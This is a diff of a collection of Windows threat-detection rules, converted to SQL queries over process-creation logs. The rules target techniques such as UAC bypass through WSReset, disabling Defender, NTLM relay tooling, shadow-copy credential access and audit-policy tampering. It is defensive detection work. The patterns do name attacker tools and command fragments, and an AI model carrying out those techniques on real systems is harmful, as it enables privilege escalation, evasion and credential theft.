"id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Bypass UAC via WSReset.exe", + "id": 
"d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", - "attack.defense_evasion", - "attack.t1562.001" + "attack.defense_evasion" ], "falsepositives": [ 
"Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_netsh_port_forwarding.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Administrator or administrator scripts might leverage the flags 
mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1140" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dinjector.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, 
{ - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Legitimate use of Nim on a developer systems" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Import 
PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND 
CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND 
(CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", - "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE 
'\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", 
@@ -17837,15161 +17401,15313 @@ "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, - { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", - "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. 
The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator working with shadow copies, access for backup purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') 
OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + 
"filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "title": "Suspicious File Downloaded From 